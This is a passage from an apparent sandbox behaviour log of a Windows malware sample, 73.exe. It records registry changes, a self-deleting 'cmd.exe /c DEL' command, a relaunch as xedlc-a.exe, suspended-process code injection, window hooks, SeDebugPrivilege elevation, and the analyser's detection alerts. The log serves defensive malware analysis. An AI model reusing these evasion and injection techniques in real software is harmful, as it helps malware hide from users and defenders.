- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48463
- mode: setval
- sequenceNumber: 172
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Cache" = C:\Documents and Settings\admin\Local Settings\Temporary Internet Files
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48468
- mode: added
- sequenceNumber: 173
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- folder:
- timestamp: 48474
- mode: open
- sequenceNumber: 174
- value: C:\Documents and Settings\admin\Cookies
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x200000
- regkey:
- timestamp: 48469
- mode: added
- sequenceNumber: 175
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 48469
- mode: setval
- sequenceNumber: 176
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Cookies" = C:\Documents and Settings\admin\Cookies
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 48524
- mode: started
- sequenceNumber: 177
- value: C:\WINDOWS\system32\cmd.exe
- pid: 1420
- ppid: 364
- parentname: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- cmdline: "C:\WINDOWS\system32\cmd.exe" /c DEL C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
- filesize: 389120
- md5sum: 6d778e0f95447e6546553eeea709d03c
- sha1sum: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
- ads:
- fid (ads:): 844424930139260
- apicall:
- timestamp: 48530
- sequenceNumber: 178
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x755dd323
- params:
- param (id:1): 0x12faec
- param (id:2): 261
- apicall:
- timestamp: 48534
- sequenceNumber: 179
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x755dd323
- params:
- param (id:1): 0x12faec
- param (id:2): 261
- mutex:
- timestamp: 48535
- sequenceNumber: 180
- value: \BaseNamedObjects\VideoRenderer
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 48579
- sequenceNumber: 181
- value: \BaseNamedObjects\SHIMLIB_LOG_MUTEX
- processinfo:
- pid: 1420
- imagepath: C:\WINDOWS\system32\cmd.exe
- md5sum: 6d778e0f95447e6546553eeea709d03c
- regkey:
- timestamp: 48586
- mode: added
- sequenceNumber: 182
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio
- processinfo:
- pid: 1420
- imagepath: C:\WINDOWS\system32\cmd.exe
- md5sum: 6d778e0f95447e6546553eeea709d03c
- regkey:
- timestamp: 48619
- mode: added
- sequenceNumber: 183
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\
- processinfo:
- pid: 1420
- imagepath: C:\WINDOWS\system32\cmd.exe
- md5sum: 6d778e0f95447e6546553eeea709d03c
- process:
- timestamp: 48643
- mode: terminated
- sequenceNumber: 184
- value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- pid: 364
- ppid: 1824
- parentname: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- cmdline: N/A
- ads:
- fid (ads:): 3096224743826754
- regkey:
- timestamp: 48646
- mode: added
- sequenceNumber: 185
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM
- processinfo:
- pid: 1420
- imagepath: C:\WINDOWS\system32\cmd.exe
- md5sum: 6d778e0f95447e6546553eeea709d03c
- regkey:
- timestamp: 48649
- mode: added
- sequenceNumber: 186
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\
- processinfo:
- pid: 1420
- imagepath: C:\WINDOWS\system32\cmd.exe
- md5sum: 6d778e0f95447e6546553eeea709d03c
- regkey:
- timestamp: 48649
- mode: added
- sequenceNumber: 187
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00
- processinfo:
- pid: 1420
- imagepath: C:\WINDOWS\system32\cmd.exe
- md5sum: 6d778e0f95447e6546553eeea709d03c
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 188
- timestamp: 48669
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1420
- imagepath: C:\WINDOWS\system32\cmd.exe
- md5sum: 6d778e0f95447e6546553eeea709d03c
- file:
- timestamp: 48682
- mode: delete
- sequenceNumber: 189
- value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- processinfo:
- tainted: true
- pid: 1420
- imagepath: C:\WINDOWS\system32\cmd.exe
- md5sum: 6d778e0f95447e6546553eeea709d03c
- ads:
- fid (ads:): 3096224743826754
- ntstatus: 0x0
- CreateOptions: 0x0
- PE:
- InspectionType: Ext
- malicious-alert:
- classtype: Self-Delete
- weight: 0
- ruleid: 1712 : Self deletion using batch file ; Process deleting itself using a batch file
- msg: Process deleting itself using a batch file
- display-msg: Self deletion using batch file
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10111 : Suspicious Code Injection ; Suspicious Self Code Injection
- msg: Suspicious Self Code Injection
- display-msg: Suspicious Code Injection
- malicious-alert:
- classtype: Self-Delete
- weight: 0
- ruleid: 1701 : Root process deleted ; Process deleting itself
- msg: Process deleting itself
- display-msg: Root process deleted
- process:
- timestamp: 48697
- mode: terminated
- sequenceNumber: 190
- value: C:\WINDOWS\system32\cmd.exe
- pid: 1420
- ppid: 364
- parentname: C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
- cmdline: N/A
- ads:
- fid (ads:): 844424930139260
- process:
- timestamp: 49469
- mode: started
- sequenceNumber: 191
- value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- pid: 1056
- ppid: 800
- parentname: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- cmdline: "C:\Documents and Settings\admin\Application Data\xedlc-a.exe"
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- ads:
- fid (ads:): 1407374883609148
- codeinjection:
- timestamp: 49489
- suppressed: false
- mode: create process suspended memory write code injection
- sequenceNumber: 192
- source:
- tainted: true
- processinfo:
- pid: 800
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- target:
- tainted: true
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 49493
- mode: terminated
- sequenceNumber: 193
- value: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- pid: 800
- ppid: 364
- parentname: C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
- cmdline: N/A
- ads:
- fid (ads:): 1407374883609148
- file:
- timestamp: 49505
- mode: failed
- sequenceNumber: 194
- value: C:\Documents and Settings\admin\Application Data\LPK.DLL
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 49512
- mode: failed
- sequenceNumber: 195
- value: C:\Documents and Settings\admin\Application Data\USP10.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 49542
- mode: duplicate_opened
- sequenceNumber: 196
- desiredaccess: 0x00000000
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- duplicate_source:
- processinfo:
- pid: 1056
- tid: 0
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- duplicate_target:
- processinfo:
- pid: 1056
- tid: 0
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- InheritHandle: 0x00000000
- Options: 0x00000002
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49557
- mode: added
- sequenceNumber: 197
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 198
- timestamp: 49564
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49575
- mode: added
- sequenceNumber: 199
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49579
- mode: added
- sequenceNumber: 200
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49583
- mode: setval
- sequenceNumber: 201
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 49583
- sequenceNumber: 202
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49591
- sequenceNumber: 203
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49608
- sequenceNumber: 204
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49622
- sequenceNumber: 205
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49637
- sequenceNumber: 206
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49652
- sequenceNumber: 207
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49669
- sequenceNumber: 208
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49684
- sequenceNumber: 209
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49699
- sequenceNumber: 210
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- file:
- timestamp: 49717
- mode: failed
- sequenceNumber: 211
- value: C:\Documents and Settings\admin\Application Data\CLBCATQ.DLL
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 49723
- mode: failed
- sequenceNumber: 212
- value: C:\Documents and Settings\admin\Application Data\COMRes.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 49727
- sequenceNumber: 213
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x76fd7ee4
- params:
- param (id:1): 0x77043650
- param (id:2): 261
- mutex:
- timestamp: 49736
- sequenceNumber: 214
- value: \BaseNamedObjects\AMResourceMutex2
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 49739
- sequenceNumber: 215
- value: \BaseNamedObjects\VideoRenderer
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 49743
- sequenceNumber: 216
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x74723c7f
- params:
- param (id:1): 0xd3f568
- param (id:2): 261
- apicall:
- timestamp: 49748
- sequenceNumber: 217
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x74723c7f
- params:
- param (id:1): 0xd3f570
- param (id:2): 261
- mutex:
- timestamp: 49753
- sequenceNumber: 218
- value: \BaseNamedObjects\CTF.LBES.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 49757
- sequenceNumber: 219
- value: \BaseNamedObjects\CTF.Compart.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 49761
- sequenceNumber: 220
- value: \BaseNamedObjects\CTF.Asm.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 49765
- sequenceNumber: 221
- value: \BaseNamedObjects\CTF.Layouts.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 49769
- sequenceNumber: 222
- value: \BaseNamedObjects\CTF.TMD.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 49769
- sequenceNumber: 223
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x74723c7f
- params:
- param (id:1): 0xd3f4bc
- param (id:2): 261
- mutex:
- timestamp: 49782
- sequenceNumber: 224
- value: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-1409082233-688789844-725345543-1003MUTEX.DefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 49787
- sequenceNumber: 225
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: SetWindowsHookExA
- address: 0x7473097c
- params:
- param (id:1): 2
- param (id:2): 0x747307c3
- param (id:3): 0x74720000
- param (id:4): 684
- apicall:
- timestamp: 49791
- sequenceNumber: 226
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: SetWindowsHookExA
- address: 0x7473099a
- params:
- param (id:1): 7
- param (id:2): 0x747304cd
- param (id:3): 0x74720000
- param (id:4): 684
- apicall:
- timestamp: 49797
- sequenceNumber: 227
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x763982be
- params:
- param (id:1): 0xd3ef98
- param (id:2): 260
- apicall:
- timestamp: 49803
- sequenceNumber: 228
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x763982be
- params:
- param (id:1): 0xd3f548
- param (id:2): 260
- apicall:
- timestamp: 49810
- sequenceNumber: 229
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x755dd289
- params:
- param (id:1): 0xd3eb8c
- param (id:2): 261
- apicall:
- timestamp: 49814
- sequenceNumber: 230
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x755dd289
- params:
- param (id:1): 0xd3f630
- param (id:2): 261
- apicall:
- timestamp: 49819
- sequenceNumber: 231
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x763982be
- params:
- param (id:1): 0xd3f1b8
- param (id:2): 260
- file:
- timestamp: 49826
- mode: failed
- sequenceNumber: 232
- value: C:\Documents and Settings\admin\Application Data\MSVFW32.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- timestamp: 49831
- mode: added
- sequenceNumber: 233
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49835
- mode: setval
- sequenceNumber: 234
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"CD Burning" = C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\CD Burning
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49841
- mode: added
- sequenceNumber: 235
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- folder:
- timestamp: 49847
- mode: open
- sequenceNumber: 236
- value: C:\Documents and Settings\admin\My Documents
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x200000
- regkey:
- timestamp: 49850
- mode: added
- sequenceNumber: 237
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49853
- mode: setval
- sequenceNumber: 238
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Personal" = C:\Documents and Settings\admin\My Documents
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49858
- mode: added
- sequenceNumber: 239
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49862
- mode: added
- sequenceNumber: 240
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49866
- mode: setval
- sequenceNumber: 241
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49870
- mode: added
- sequenceNumber: 242
- value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49874
- mode: added
- sequenceNumber: 243
- value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49878
- mode: setval
- sequenceNumber: 244
- value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Desktop" = C:\Documents and Settings\All Users\Desktop
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49882
- mode: added
- sequenceNumber: 245
- value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 49886
- mode: setval
- sequenceNumber: 246
- value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData" = C:\Documents and Settings\All Users\Application Data
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 49891
- sequenceNumber: 247
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: ntdll.dll
- apiname: NtAdjustPrivilegesToken
- address: 0x77ddf01a
- params:
- param (id:1): SeDebugPrivilege
- param (id:2): Enabled
- apicall:
- timestamp: 49895
- sequenceNumber: 248
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: GetTokenInformation
- address: 0x0041e684
- params:
- param (id:1): 0x1b4
- param (id:2): 0x19
- apicall:
- timestamp: 49899
- sequenceNumber: 249
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49902
- sequenceNumber: 250
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49918
- sequenceNumber: 251
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
